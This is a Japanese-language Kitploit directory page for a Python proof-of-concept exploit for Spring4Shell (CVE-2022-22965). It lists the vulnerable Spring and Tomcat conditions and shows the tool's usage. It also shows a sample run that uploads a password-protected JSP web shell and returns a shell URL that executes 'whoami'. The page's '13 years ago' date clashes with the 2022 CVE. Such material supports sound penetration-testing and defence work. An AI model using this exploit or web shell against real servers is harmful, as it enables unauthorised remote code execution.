Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

CVE-2022-22965(Spring4Shell)を対象としたPythonベースの概念実証エクスプロイトで、Apache Tomcat上のJava Spring Core RCEを狙います。パスワード保護付きのJSPウェブシェルをアップロードし、リモートコマンド実行を可能にします。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
13年前未レビュー

Spring4Shell: CVE-2022-22965 RCE

Java Spring framework RCE 脆弱性

これらの脆弱性は、フレームワークの中核である「Spring Core」コンポーネントに影響を与えます。

現在の脆弱性の条件:-

  • JDK 9+
  • 脆弱性のあるバージョンのSpring Framework(<5.2 | 5.2.0-19 | 5.3.0-17)
  • SpringアプリケーションのサーバーとしてApache Tomcatを使用し、WARとしてパッケージ化されていること
  • Spring Frameworkのspring-webmvcやspring-webfluxコンポーネントへの依存

エクスプロイト

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
ツールをダウンロード